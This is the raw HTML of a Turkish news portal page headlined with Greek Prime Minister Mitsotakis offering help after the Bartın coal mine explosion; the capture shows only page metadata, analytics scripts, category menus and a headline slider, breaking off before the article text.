<!DOCTYPE html>
<html lang="tr" class="no-inlinesvg sayfa-haber">
<head>
<meta http-equiv="Content-Type" content="text/html;charset=UTF-8" />
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<title>Yunanistan Başbakanı Miçotakis: Türkiye&#039;ye yardıma hazırız - Kamu Saati</title>
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="description" content="Yunanistan Başbakanı Kyriakos Miçotakis, Bartın&#039;daki kömür madeninde meydana gelen patlamadan duyduğu üzüntüyü dile getirerek, &#039;Yunanistan, arama çalışmalarına yardım göndermeye hazır&#039; dedi." />
<meta name="keywords" content="" />
<meta name="news_keywords" content="" />
<meta name="robots" content="noodp"/>
<meta name="author" content="Kamu Saati" />
<meta property="fb:admins" content="100004451415770" /><meta property="og:type" content="article" />
<meta property="og:site_name" content="Kamu Saati">
<meta property="og:title" content="Yunanistan Başbakanı Miçotakis: Türkiye&#039;ye yardıma hazırız - Kamu Saati">
<meta property="og:description" content="Yunanistan Başbakanı Kyriakos Miçotakis, Bartın&#039;daki kömür madeninde meydana gelen patlamadan duyduğu üzüntüyü dile getirerek, &#039;Yunanistan, arama çalışmalarına yardım göndermeye hazır&#039; dedi.">
<meta property="og:url" content="https://www.kamusaati.com/gundem/yunanistan-basbakani-micotakis-turkiye-ye-yardima-haziriz-h53554.html">
<meta property="og:image" content="https://www.kamusaati.com/images/haberler/2022/10/yunanistan_basbakani_micotakis_turkiye_ye_yardima_haziriz_h53554_b9b83.png" />
  <meta property="og:type" content="article">
<meta http-equiv="refresh" content="300">
<meta name="twitter:card" content="summary_large_image">
<meta name="og:title" content="Yunanistan Başbakanı Miçotakis: Türkiye&#039;ye yardıma hazırız">
<meta name="twitter:url" content="http://www.kamusaati.com/gundem/yunanistan-basbakani-micotakis-turkiye-ye-yardima-haziriz-h53554.html">
<meta name="twitter:domain" content="https://www.kamusaati.com/">
<meta name="twitter:site" content="kamusaaticom">
<meta name="twitter:title" content="Yunanistan Başbakanı Miçotakis: Türkiye&#039;ye yardıma hazırız">
<meta name="twitter:description" content="Yunanistan Başbakanı Kyriakos Miçotakis, Bartın&#039;daki kömür madeninde meydana gelen patlamadan duyduğu üzüntüyü dile getirerek, &#039;Yunanistan, arama çalışmalarına yardım göndermeye hazır&#039; dedi.">
<meta name="twitter:image:src" content="https://www.kamusaati.com/images/haberler/2022/10/yunanistan_basbakani_micotakis_turkiye_ye_yardima_haziriz_h53554_b9b83.png">
<link rel="alternate" href="https://www.kamusaati.com/m/gundem/yunanistan-basbakani-micotakis-turkiye-ye-yardima-haziriz-h53554.html" hreflang="tr" media="only screen and (max-width: 640px)"/>
<!-- =[Favicon]= -->
<link rel="shortcut icon" href="https://www.kamusaati.com/_themes/hs-royal/images/favicon.ico"><link rel="canonical" href="https://www.kamusaati.com/gundem/yunanistan-basbakani-micotakis-turkiye-ye-yardima-haziriz-h53554.html">

 <!-- ==[Fonts]== -->
<link href='//fonts.googleapis.com/css?family=PT+Sans:400,700&amp;subset=latin,latin-ext' rel='stylesheet' type='text/css'>
<link href='//fonts.googleapis.com/css?family=Open+Sans:600,700,400&amp;subset=latin,latin-ext' rel='stylesheet' type='text/css'>
<link href="https://www.kamusaati.com/_themes/hs-royal/style/print.css" rel="stylesheet">
<link href="https://www.kamusaati.com/_themes/hs-royal/style/compress.css" rel="stylesheet" />
<link href="https://www.kamusaati.com/_themes/hs-royal/style/renk.css" rel="stylesheet"/>
<link rel="image_src" type="image/jpeg" href="https://www.kamusaati.com/images/haberler/2022/10/yunanistan_basbakani_micotakis_turkiye_ye_yardima_haziriz_h53554_b9b83.png" />
<meta name="google-play-app" content="app-id=com.tebilisim.android.kamusaati"><link rel="stylesheet" href="https://www.kamusaati.com/_themes/hs-royal/style/jquery.smartbanner.css" type="text/css" media="screen">


<meta name="dc.language" content="tr">
<meta name="dc.source" content="https://www.kamusaati.com/">
<meta name="dc.title" content="Yunanistan Başbakanı Miçotakis: Türkiye&#039;ye yardıma hazırız - Kamu Saati">
<meta name="dc.keywords" content="">
<meta name="dc.description" content="Yunanistan Başbakanı Kyriakos Miçotakis, Bartın&#039;daki kömür madeninde meydana gelen patlamadan duyduğu üzüntüyü dile getirerek, &#039;Yunanistan, arama çalışmalarına yardım göndermeye hazır&#039; dedi.">

<link rel="dns-prefetch" href="//www.kamusaati.com">
<link rel="dns-prefetch" href="//www.google-analytics.com">
<link rel="dns-prefetch" href="//fonts.gstatic.com">
<link rel="dns-prefetch" href="//mc.yandex.ru">
<link rel="dns-prefetch" href="//fonts.googleapis.com">
<link rel="dns-prefetch" href="//pagead2.googlesyndication.com">
<link rel="dns-prefetch" href="//googleads.g.doubleclick.net">
<link rel="dns-prefetch" href="//google.com">
<link rel="dns-prefetch" href="//gstatic.com">
<link rel="dns-prefetch" href="//connect.facebook.net">
<link rel="dns-prefetch" href="//graph.facebook.com">
<link rel="dns-prefetch" href="//linkedin.com">
<link rel="dns-prefetch" href="//ap.pinterest.com">




<!--[if IE 7]>
<style type="text/css">
    .reklam.dikey.sol .fixed {
        margin-left:-300px;
    }
</style>
<![endif]-->


<!-- HTML5 shim and Respond.js for IE8 support of HTML5 elements and media queries -->
<!--[if lt IE 9]>
	<script src="https://oss.maxcdn.com/html5shiv/3.7.2/html5shiv.min.js"></script>
	<script src="https://oss.maxcdn.com/respond/1.4.2/respond.min.js"></script>
<![endif]-->



<script type="text/javascript">
var site_url   = 'https://www.kamusaati.com/',
tema       = 'hs-royal',
theme_path = 'https://www.kamusaati.com/_themes/hs-royal/',
ajax_url   = '_ajax/',
hava   = '1',
hava_default   = 'TUXX0002',
namaz   = '0',
namaz_default   = 'ankara',
comment_approved = '0',
popup_saat = '1',
umanset   = '1',
tema = 'hs-royal',
surum = '1.2.3',
sistem = '5.14',
slayt_ayar   = 5000,
youtube_ch = 'UCcDbuYItq1cY_1ITKBAv5Jg',
uye_gir = 'Giriş Yap',
uye_ol = 'Üye Ol',
cikis_yap = 'Çıkış Yap',
baglan_fb = 'Bağlan',
sifremi_unuttum = 'Şifremi Unuttum?',
devamini_oku = 'Devamını Oku...',
gizle = 'Gizle',
hs_goster = 'Göster',
hs_gizle = 'Gizle',
hs_data_table = '//service.tebilisim.com/puandurumu_json.php',
manset_tipi= 'numarali',
analitik_ga = 'UA-89464456-1';
</script>

<!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-86740744-2"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'UA-86740744-2');
</script>

<meta name="google-site-verification" content="8z0298yfnXSExIhzjapmXXzEMoFNETUPugExkp7sAjA" />
<!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-86740744-2"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'UA-86740744-2');
</script></head>
<body>
<!--Header başlangıç-->
<nav class="navbar navbar-default navbar-fixed-top">
  <div class="container center ">
    <div class="navbar-header">
      <button type="button" class="navbar-toggle toggle-menu menu-left push-body pull-left jPushMenuBtn" data-toggle="collapse" data-target="#nav-menu">
        <i class="fa fa-bars fa-fw"></i>
      </button>
          <a class="navbar-brand" href="https://www.kamusaati.com/">
            <img src="https://www.kamusaati.com/images/banner/652.png" alt="Kamu Haber Memurlar İşçi Memur Personel Alımı İş İlanları Kamusaati" class="img-responsive" />
          </a>
    </div>
    <div class="navbar-collapse collapse cbp-spmenu cbp-spmenu-vertical cbp-spmenu-left" id="nav-menu">
      <ul class="nav navbar-nav">
        <!--mobil arama başlangıç-->
        <li class="row visible-xs">
          <form action="https://www.kamusaati.com/" method="get" class="navbar-form navbar-left">
            <input type="hidden" name="m" value="arama">
                                            
            <div class="input-group">
              <input type="search" name="q" class="form-control input-sm" placeholder="Haber Ara..">
                <input type="hidden" name="auth" value="2cb1e3bb4570276ca3712ea10f5d4fad36d46292" />
              <div class="input-group-btn">
                <button type="submit" class="btn btn-danger">
                  <span class="fa fa-search"></span>
                </button>
              </div>
            </div>
          </form>
        </li>
        <!--mobil arama başlangıç-->
        <!--Menüler başlangıç-->
        <li >
          <a href="https://www.kamusaati.com/">
            <i class="fa fa-home"></i>
            <span class="visible-xs">Anasayfa</span>
          </a>
        </li>
        <li class="dropdown">
          <a href="javascript:void(0);" class="dropdown-toggle" data-toggle="dropdown" data-hover="dropdown">
            <i class="fa fa-th-list fa-fw"></i>
            <span class="hidden-sm hidden-md">Kategoriler</span>
            <b class="caret"></b>
          </a>
          <!-- Burası Mobilde Gözükecek -->
          <ul class="dropdown-menu visible-xs">
              <li><a href="https://www.kamusaati.com/resmi-gazete/">Resmi Gazete</a></li>
<li><a href="https://www.kamusaati.com/ogretmenler-ve-meb-personelleri/">Öğretmenler ve Meb Personelleri</a></li>
<li><a href="https://www.kamusaati.com/teog-haberleri/">TEOG Haberleri</a></li>
<li class="active"><a href="https://www.kamusaati.com/gundem/">Gündem</a></li>
<li><a href="https://www.kamusaati.com/kose-yazisi/">Köşe Yazısı</a></li>
<li><a href="https://www.kamusaati.com/personel-alimi/">Personel Alımı</a></li>
<li><a href="https://www.kamusaati.com/memurlar/">Memurlar</a></li>
<li><a href="https://www.kamusaati.com/egitim-haberleri/">Eğitim Haberleri</a></li>
<li><a href="https://www.kamusaati.com/atama-haberleri/">Atama Haberleri</a></li>
<li><a href="https://www.kamusaati.com/sinav-haberleri/">Sınav Haberleri</a></li>
<li><a href="https://www.kamusaati.com/secim-haberleri/">Seçim Haberleri</a></li>
<li><a href="https://www.kamusaati.com/ogretmen-atamalari/">Öğretmen Atamaları</a></li>
<li><a href="https://www.kamusaati.com/saglik-personelleri/">Sağlık Personelleri</a></li>
<li><a href="https://www.kamusaati.com/akademik-personel-haberleri/">Akademik Personel Haberleri</a></li>
<li><a href="https://www.kamusaati.com/emekli-haberleri/">Emekli Haberleri</a></li>
<li><a href="https://www.kamusaati.com/magazin-haberleri/">Magazin Haberleri</a></li>
<li><a href="https://www.kamusaati.com/asayis-haberleri/">Asayiş Haberleri</a></li>
<li><a href="https://www.kamusaati.com/adalet-personeli/">Adalet Personeli</a></li>
<li><a href="https://www.kamusaati.com/diyanet-haberleri/">Diyanet Haberleri</a></li>
<li><a href="https://www.kamusaati.com/belediye-personeli/">Belediye Personeli</a></li>
<li><a href="https://www.kamusaati.com/isci-haberleri/">İşçi Haberleri</a></li>
<li><a href="https://www.kamusaati.com/dunyadan-haberler/">Dünyadan Haberler</a></li>
<li><a href="https://www.kamusaati.com/turkiye-haberleri/">Türkiye Haberleri</a></li>
<li><a href="https://www.kamusaati.com/kpss-haberleri/">KPSS Haberleri</a></li>
<li><a href="https://www.kamusaati.com/emniyet-personeli/">Emniyet Personeli</a></li>
<li><a href="https://www.kamusaati.com/askeri-personel/">Askeri Personel</a></li>
<li><a href="https://www.kamusaati.com/saglik-haberleri/">Sağlık Haberleri</a></li>
<li><a href="https://www.kamusaati.com/ozel-dosya/">Özel Dosya</a></li>
<li><a href="https://www.kamusaati.com/sendika/">Sendika</a></li>
<li><a href="https://www.kamusaati.com/ekonomi-haberleri/">Ekonomi Haberleri</a></li>
<li><a href="https://www.kamusaati.com/haberler/">Haberler</a></li>
<li><a href="https://www.kamusaati.com/sgk-haberleri/">SGK Haberleri</a></li>
<li><a href="https://www.kamusaati.com/siyaset-haberleri/">Siyaset Haberleri</a></li>
<li><a href="https://www.kamusaati.com/spor-haberleri/">Spor Haberleri</a></li>
<li><a href="https://www.kamusaati.com/son-dakika-haberleri/">Son Dakika Haberleri</a></li>
<li><a href="https://www.kamusaati.com/teknoloji-haberleri/">Teknoloji Haberleri</a></li>
<li><a href="https://www.kamusaati.com/spor/">Spor</a></li>
<li><a href="https://www.kamusaati.com/saglik/">Sağlık</a></li>
<li><a href="https://www.kamusaati.com/politika/">Politika</a></li>
<li><a href="https://www.kamusaati.com/genel/">Genel</a></li>
<li><a href="https://www.kamusaati.com/ekonomi/">Ekonomi</a></li>
<li><a href="https://www.kamusaati.com/bilim-teknoloji/">Bilim, Teknoloji</a></li>
<li><a href="https://www.kamusaati.com/kultur-sanat/">KÜLTÜR-SANAT</a></li>
<li><a href="https://www.kamusaati.com/formasyon-haberleri/">Formasyon Haberleri</a></li>
<li><a href="https://www.kamusaati.com/medya/">Medya</a></li>
<li><a href="https://www.kamusaati.com/yok-haberleri/">YÖK Haberleri</a></li>
<li><a href="https://www.kamusaati.com/universite-haberleri/">Üniversite Haberleri</a></li>
<li><a href="https://www.kamusaati.com/ilan-saati/">İLAN SAATİ</a></li>
<li><a href="https://www.kamusaati.com/sibelin-mutfagi/">Sibelin Mutfağı</a></li>
<li><a href="https://www.kamusaati.com/lgs-haberleri/">LGS Haberleri</a></li>
            <!-- Kategori Liste sayfası olmadığı için burada bütün kategoriler listelenecek. -->
          </ul>
          <!-- // Burası Mobilde Gözükecek -->
          <!-- Burası Mobilde Gözükmeyecek -->
          <div class="dropdown-menu hidden-xs">
            <div class="row">
              <div class="col-sm-2">
                <ul class="nav nav-pills nav-stacked" role="tablist" data-toggle="tab-hover">
                  <li class="active"><a href="#resmi-gazete" onclick="window.open('https://www.kamusaati.com/resmi-gazete'); return false;" role="tab" data-url="143" data-toggle="tab">Resmi Gazete</a></li>
<li><a href="#ogretmenler-ve-meb-personelleri" onclick="window.open('https://www.kamusaati.com/ogretmenler-ve-meb-personelleri'); return false;" role="tab" data-url="103" data-toggle="tab">Öğretmenler ve Meb Personelleri</a></li>
<li><a href="#teog-haberleri" onclick="window.open('https://www.kamusaati.com/teog-haberleri'); return false;" role="tab" data-url="146" data-toggle="tab">TEOG Haberleri</a></li>
<li><a href="#gundem" onclick="window.open('https://www.kamusaati.com/gundem'); return false;" role="tab" data-url="141" data-toggle="tab">Gündem</a></li>
<li><a href="#kose-yazisi" onclick="window.open('https://www.kamusaati.com/kose-yazisi'); return false;" role="tab" data-url="144" data-toggle="tab">Köşe Yazısı</a></li>
<li><a href="#personel-alimi" onclick="window.open('https://www.kamusaati.com/personel-alimi'); return false;" role="tab" data-url="132" data-toggle="tab">Personel Alımı</a></li>
<li><a href="#memurlar" onclick="window.open('https://www.kamusaati.com/memurlar'); return false;" role="tab" data-url="80" data-toggle="tab">Memurlar</a></li>
<li><a href="#egitim-haberleri" onclick="window.open('https://www.kamusaati.com/egitim-haberleri'); return false;" role="tab" data-url="77" data-toggle="tab">Eğitim Haberleri</a></li>
<li><a href="#atama-haberleri" onclick="window.open('https://www.kamusaati.com/atama-haberleri'); return false;" role="tab" data-url="76" data-toggle="tab">Atama Haberleri</a></li>
<li class="dropdown"><a href="https://www.kamusaati.com/#othercat" role="tab" data-url="-1" data-toggle="tab" >Diğer Kategoriler</a></li>
                </ul>
              </div>
              <div class="col-sm-10">
                <div class="tab-content">
                  <!--Haber Kategori İçeriği-->
                  <div role="tabpanel" class="tab-pane active cat0" id="resmi-gazete">
                  </div>
                  <div role="tabpanel" class="tab-pane" id="ogretmenler-ve-meb-personelleri">
                  </div>
                  <div role="tabpanel" class="tab-pane" id="teog-haberleri">
                  </div>
                  <div role="tabpanel" class="tab-pane" id="gundem">
                  </div>
                  <div role="tabpanel" class="tab-pane" id="kose-yazisi">
                  </div>
                  <div role="tabpanel" class="tab-pane" id="personel-alimi">
                  </div>
                  <div role="tabpanel" class="tab-pane" id="memurlar">
                  </div>
                  <div role="tabpanel" class="tab-pane" id="egitim-haberleri">
                  </div>
                  <div role="tabpanel" class="tab-pane" id="atama-haberleri">
                  </div>
                                    <!--Haber Kategori İçeriği-->
                      
                          <div role="tabpanel" class="tab-pane" id="othercat">
                            <div class="btn-group item"><a href="https://www.kamusaati.com/sinav-haberleri" class="btn btn-info btn-icon-left btn-sm"  target="_blank"><i class="fa fa-tag"></i> Sınav Haberleri</a></div><div class="btn-group item"><a href="https://www.kamusaati.com/secim-haberleri" class="btn btn-info btn-icon-left btn-sm"  target="_blank"><i class="fa fa-tag"></i> Seçim Haberleri</a></div><div class="btn-group item"><a href="https://www.kamusaati.com/ogretmen-atamalari" class="btn btn-info btn-icon-left btn-sm"  target="_blank"><i class="fa fa-tag"></i> Öğretmen Atamaları</a></div><div class="btn-group item"><a href="https://www.kamusaati.com/saglik-personelleri" class="btn btn-info btn-icon-left btn-sm"  target="_blank"><i class="fa fa-tag"></i> Sağlık Personelleri</a></div><div class="btn-group item"><a href="https://www.kamusaati.com/akademik-personel-haberleri" class="btn btn-info btn-icon-left btn-sm"  target="_blank"><i class="fa fa-tag"></i> Akademik Personel Haberleri</a></div><div class="btn-group item"><a href="https://www.kamusaati.com/emekli-haberleri" class="btn btn-info btn-icon-left btn-sm"  target="_blank"><i class="fa fa-tag"></i> Emekli Haberleri</a></div><div class="btn-group item"><a href="https://www.kamusaati.com/magazin-haberleri" class="btn btn-info btn-icon-left btn-sm"  target="_blank"><i class="fa fa-tag"></i> Magazin Haberleri</a></div><div class="btn-group item"><a href="https://www.kamusaati.com/asayis-haberleri" class="btn btn-info btn-icon-left btn-sm"  target="_blank"><i class="fa fa-tag"></i> Asayiş Haberleri</a></div><div class="btn-group item"><a href="https://www.kamusaati.com/adalet-personeli" class="btn btn-info btn-icon-left btn-sm"  target="_blank"><i class="fa fa-tag"></i> Adalet Personeli</a></div><div class="btn-group item"><a href="https://www.kamusaati.com/diyanet-haberleri" class="btn btn-info btn-icon-left btn-sm"  target="_blank"><i class="fa fa-tag"></i> Diyanet Haberleri</a></div><div class="btn-group item"><a href="https://www.kamusaati.com/belediye-personeli" class="btn btn-info btn-icon-left btn-sm"  target="_blank"><i class="fa fa-tag"></i> Belediye Personeli</a></div><div class="btn-group item"><a href="https://www.kamusaati.com/isci-haberleri" class="btn btn-info btn-icon-left btn-sm"  target="_blank"><i class="fa fa-tag"></i> İşçi Haberleri</a></div><div class="btn-group item"><a href="https://www.kamusaati.com/dunyadan-haberler" class="btn btn-info btn-icon-left btn-sm"  target="_blank"><i class="fa fa-tag"></i> Dünyadan Haberler</a></div><div class="btn-group item"><a href="https://www.kamusaati.com/turkiye-haberleri" class="btn btn-info btn-icon-left btn-sm"  target="_blank"><i class="fa fa-tag"></i> Türkiye Haberleri</a></div><div class="btn-group item"><a href="https://www.kamusaati.com/kpss-haberleri" class="btn btn-info btn-icon-left btn-sm"  target="_blank"><i class="fa fa-tag"></i> KPSS Haberleri</a></div><div class="btn-group item"><a href="https://www.kamusaati.com/emniyet-personeli" class="btn btn-info btn-icon-left btn-sm"  target="_blank"><i class="fa fa-tag"></i> Emniyet Personeli</a></div><div class="btn-group item"><a href="https://www.kamusaati.com/askeri-personel" class="btn btn-info btn-icon-left btn-sm"  target="_blank"><i class="fa fa-tag"></i> Askeri Personel</a></div><div class="btn-group item"><a href="https://www.kamusaati.com/saglik-haberleri" class="btn btn-info btn-icon-left btn-sm"  target="_blank"><i class="fa fa-tag"></i> Sağlık Haberleri</a></div><div class="btn-group item"><a href="https://www.kamusaati.com/ozel-dosya" class="btn btn-info btn-icon-left btn-sm"  target="_blank"><i class="fa fa-tag"></i> Özel Dosya</a></div><div class="btn-group item"><a href="https://www.kamusaati.com/sendika" class="btn btn-info btn-icon-left btn-sm"  target="_blank"><i class="fa fa-tag"></i> Sendika</a></div><div class="btn-group item"><a href="https://www.kamusaati.com/ekonomi-haberleri" class="btn btn-info btn-icon-left btn-sm"  target="_blank"><i class="fa fa-tag"></i> Ekonomi Haberleri</a></div><div class="btn-group item"><a href="https://www.kamusaati.com/haberler" class="btn btn-info btn-icon-left btn-sm"  target="_blank"><i class="fa fa-tag"></i> Haberler</a></div><div class="btn-group item"><a href="https://www.kamusaati.com/sgk-haberleri" class="btn btn-info btn-icon-left btn-sm"  target="_blank"><i class="fa fa-tag"></i> SGK Haberleri</a></div><div class="btn-group item"><a href="https://www.kamusaati.com/siyaset-haberleri" class="btn btn-info btn-icon-left btn-sm"  target="_blank"><i class="fa fa-tag"></i> Siyaset Haberleri</a></div><div class="btn-group item"><a href="https://www.kamusaati.com/spor-haberleri" class="btn btn-info btn-icon-left btn-sm"  target="_blank"><i class="fa fa-tag"></i> Spor Haberleri</a></div><div class="btn-group item"><a href="https://www.kamusaati.com/son-dakika-haberleri" class="btn btn-info btn-icon-left btn-sm"  target="_blank"><i class="fa fa-tag"></i> Son Dakika Haberleri</a></div><div class="btn-group item"><a href="https://www.kamusaati.com/teknoloji-haberleri" class="btn btn-info btn-icon-left btn-sm"  target="_blank"><i class="fa fa-tag"></i> Teknoloji Haberleri</a></div><div class="btn-group item"><a href="https://www.kamusaati.com/spor" class="btn btn-info btn-icon-left btn-sm"  target="_blank"><i class="fa fa-tag"></i> Spor</a></div><div class="btn-group item"><a href="https://www.kamusaati.com/saglik" class="btn btn-info btn-icon-left btn-sm"  target="_blank"><i class="fa fa-tag"></i> Sağlık</a></div><div class="btn-group item"><a href="https://www.kamusaati.com/politika" class="btn btn-info btn-icon-left btn-sm"  target="_blank"><i class="fa fa-tag"></i> Politika</a></div><div class="btn-group item"><a href="https://www.kamusaati.com/genel" class="btn btn-info btn-icon-left btn-sm"  target="_blank"><i class="fa fa-tag"></i> Genel</a></div><div class="btn-group item"><a href="https://www.kamusaati.com/ekonomi" class="btn btn-info btn-icon-left btn-sm"  target="_blank"><i class="fa fa-tag"></i> Ekonomi</a></div><div class="btn-group item"><a href="https://www.kamusaati.com/bilim-teknoloji" class="btn btn-info btn-icon-left btn-sm"  target="_blank"><i class="fa fa-tag"></i> Bilim, Teknoloji</a></div><div class="btn-group item"><a href="https://www.kamusaati.com/kultur-sanat" class="btn btn-info btn-icon-left btn-sm"  target="_blank"><i class="fa fa-tag"></i> KÜLTÜR-SANAT</a></div><div class="btn-group item"><a href="https://www.kamusaati.com/formasyon-haberleri" class="btn btn-info btn-icon-left btn-sm"  target="_blank"><i class="fa fa-tag"></i> Formasyon Haberleri</a></div><div class="btn-group item"><a href="https://www.kamusaati.com/medya" class="btn btn-info btn-icon-left btn-sm"  target="_blank"><i class="fa fa-tag"></i> Medya</a></div><div class="btn-group item"><a href="https://www.kamusaati.com/yok-haberleri" class="btn btn-info btn-icon-left btn-sm"  target="_blank"><i class="fa fa-tag"></i> YÖK Haberleri</a></div><div class="btn-group item"><a href="https://www.kamusaati.com/universite-haberleri" class="btn btn-info btn-icon-left btn-sm"  target="_blank"><i class="fa fa-tag"></i> Üniversite Haberleri</a></div><div class="btn-group item"><a href="https://www.kamusaati.com/ilan-saati" class="btn btn-info btn-icon-left btn-sm"  target="_blank"><i class="fa fa-tag"></i> İLAN SAATİ</a></div><div class="btn-group item"><a href="https://www.kamusaati.com/sibelin-mutfagi" class="btn btn-info btn-icon-left btn-sm"  target="_blank"><i class="fa fa-tag"></i> Sibelin Mutfağı</a></div><div class="btn-group item"><a href="https://www.kamusaati.com/lgs-haberleri" class="btn btn-info btn-icon-left btn-sm"  target="_blank"><i class="fa fa-tag"></i> LGS Haberleri</a></div>                          </div>
                        </div>
                      </div>
                    </div>
                  </div>
                  <!-- Burası Mobilde Gözükmeyecek -->
                </li>
                                                                <li >
                  <a href="https://www.kamusaati.com/yazarlar/" target="_blank">
                    <i class="fa fa-users fa-fw"></i>
                    <span class="hidden-sm hidden-md">Yazarlar</span>
                  </a>
                </li>
                                                                                                <li class="hidden-sm hidden-md hidden-lg">
                  <a href="https://www.kamusaati.com/kunye.html">
                    <i class="fa fa-info-circle fa-fw"></i>
                    <span class="hidden-sm hidden-md">Künye</span>
                  </a>
                </li>
                <li class="hidden-sm hidden-md hidden-lg">
                  <a href="https://www.kamusaati.com/iletisim.html">
                    <i class="fa fa-phone fa-fw"></i>
                    <span class="hidden-sm hidden-md">İletişim</span>
                  </a>
                </li>
              </ul>
              <ul class="nav navbar-nav navbar-right">
                <!--desktop arama başlangıç-->
                <li class="dropdown hidden-xs">
                  <a href="javascript:void(0);" class="dropdown-toggle" data-toggle="dropdown">
                    <i class="fa fa-search fa-fw"></i>
                  </a>
                  <div class="dropdown-menu">
                    <form action="https://www.kamusaati.com/" method="get" class="navbar-form">
                      <input type="hidden" name="m" value="arama">
                                                                  <div class="input-group">
                        <input type="search" name="q" id="search" class="form-control" placeholder="Haber Ara...">
                        <input type="hidden" name="auth" value="2cb1e3bb4570276ca3712ea10f5d4fad36d46292" />
                        <span class="input-group-btn">
                          <button type="submit" class="btn btn-danger">Ara</button>
                        </span>
                      </div>
                    </form>
                  </div>
                </li>
                <!--desktop arama bitiş-->
                <li class="dropdown">
                  <a href="javascript:void(0);" class="dropdown-toggle" data-toggle="dropdown">
                    <i class="fa fa-user fa-fw"></i>
                    <span class="visible-xs">Üyelik İşlemleri</span>
                  </a>
                  <ul id="memberArea" class="dropdown-menu">
               </ul>
                </li>
                                <!--Menüler bitiş-->
              </ul>
            </div>
          </div>
        </nav>
<!--Header bitiş-->
        <main style="margin-top:68px;" class="container center ">
        <!--Üst Manşet-->
<div class="umanset col-sm-12 col-xs-12 no-pd" style="margin-bottom: 10px;">
	<div class="swiper-container">
		<div class="swiper-wrapper">
							<div class="umanset-item swiper-slide">
					<a href="https://www.kamusaati.com/gundem/2023-resmi-tatiller-2023-yili-dini-bayramlar-ve-tatil-gunleri-tarihleri-h53456.html" onclick="window.open('https://www.kamusaati.com/gundem/2023-resmi-tatiller-2023-yili-dini-bayramlar-ve-tatil-gunleri-tarihleri-h53456.html'); return false;">
						<figure>
							<span class="news-overlay"></span>
							<img src="https://www.kamusaati.com/images/haberler/ustmanset/2022/09/11.png" class="img-responsive center-block" alt="2023">
														<figcaption class="small-caption">
								<div class="title one-line">2023</div>
																<div class="info">
																		<span><i class="fa fa-comment"></i> 0</span>
								</div>
															</figcaption>
													</figure>
					</a>
				</div>
								<div class="umanset-item swiper-slide">
					<a href="https://www.kamusaati.com/personel-alimi/ziraat-bankasi-personel-alimi-2022-1500-servis-gorevlisi-120-uzman-h53436.html" onclick="window.open('https://www.kamusaati.com/personel-alimi/ziraat-bankasi-personel-alimi-2022-1500-servis-gorevlisi-120-uzman-h53436.html'); return false;">
						<figure>
							<span class="news-overlay"></span>
							<img src="https://www.kamusaati.com/images/haberler/ustmanset/2022/09/KAMUSAATİ-YENİ_3.png" class="img-responsive center-block" alt="personelziraat">
														<figcaption class="small-caption">
								<div class="title one-line">personelziraat</div>
																<div class="info">
																		<span><i class="fa fa-comment"></i> 1</span>
								</div>
															</figcaption>
													</figure>
					</a>
				</div>
								<div class="umanset-item swiper-slide">
					<a href="https://www.kamusaati.com/gundem/meb-ucretsiz-tablet-basvurusu-2022-basvuru-ekrani-h53393.html" onclick="window.open('https://www.kamusaati.com/gundem/meb-ucretsiz-tablet-basvurusu-2022-basvuru-ekrani-h53393.html'); return false;">
						<figure>
							<span class="news-overlay"></span>
							<img src="https://www.kamusaati.com/images/haberler/ustmanset/2022/09/KAMUSAATİ-YENİ_2.png" class="img-responsive center-block" alt="MEB">
														<figcaption class="small-caption">
								<div class="title one-line">MEB</div>
																<div class="info">
																		<span><i class="fa fa-comment"></i> 0</span>
								</div>
															</figcaption>
													</figure>
					</a>
				</div>
								<div class="umanset-item swiper-slide">
					<a href="https://www.kamusaati.com/gundem/elektrik-destegine-nasil-basvuru-yapilir-elektrik-destegi-kac-h53333.html" onclick="window.open('https://www.kamusaati.com/gundem/elektrik-destegine-nasil-basvuru-yapilir-elektrik-destegi-kac-h53333.html'); return false;">
						<figure>
							<span class="news-overlay"></span>
							<img src="https://www.kamusaati.com/images/haberler/ustmanset/2022/09/KAMUSAATİ-YENİ_1.png" class="img-responsive center-block" alt="elektrik">
														<figcaption class="small-caption">
								<div class="title one-line">elektrik</div>
																<div class="info">
																		<span><i class="fa fa-comment"></i> 0</span>
								</div>
															</figcaption>
													</figure>
					</a>
				</div>
								<div class="umanset-item swiper-slide">
					<a href="https://www.kamusaati.com/gundem/toki-basvuru-nasil-yapilir-sosyal-konutlar-hangi-il-ve-ilcelere-h53329.html" onclick="window.open('https://www.kamusaati.com/gundem/toki-basvuru-nasil-yapilir-sosyal-konutlar-hangi-il-ve-ilcelere-h53329.html'); return false;">
						<figure>
							<span class="news-overlay"></span>
							<img src="https://www.kamusaati.com/images/haberler/ustmanset/2022/09/KAMUSAATİ-YENİ-Kurtarıldı-Kurtarıldı.png" class="img-responsive center-block" alt="">
														<figcaption class="small-caption">
								<div class="title one-line"></div>
																<div class="info">
																		<span><i class="fa fa-comment"></i> 0</span>
								</div>
															</figcaption>
													</figure>
					</a>
				</div>
								<div class="umanset-item swiper-slide">
					<a href="https://www.kamusaati.com/gundem/e-devlet-dogalgaz-yardim-basvurusu-nasil-yapilir-resimli-kolay-anlatim-h53301.html" onclick="window.open('https://www.kamusaati.com/gundem/e-devlet-dogalgaz-yardim-basvurusu-nasil-yapilir-resimli-kolay-anlatim-h53301.html'); return false;">
						<figure>
							<span class="news-overlay"></span>
							<img src="https://www.kamusaati.com/images/haberler/ustmanset/2022/09/KAMUSAATİ-YENİ.png" class="img-responsive center-block" alt="dogalgaz yardım">
														<figcaption class="small-caption">
								<div class="title one-line">dogalgaz yardım</div>
																<div class="info">
																		<span><i class="fa fa-comment"></i> 0</span>
								</div>
															</figcaption>
													</figure>
					</a>
				</div>
								<div class="umanset-item swiper-slide">
					<a href="https://www.kamusaati.com/kpss-haberleri/2023-kpss-guncel-bilgiler-2023-kpss-cikabilecek-sorular-genel-kultur-h53224.html" onclick="window.open('https://www.kamusaati.com/kpss-haberleri/2023-kpss-guncel-bilgiler-2023-kpss-cikabilecek-sorular-genel-kultur-h53224.html'); return false;">
						<figure>
							<span class="news-overlay"></span>
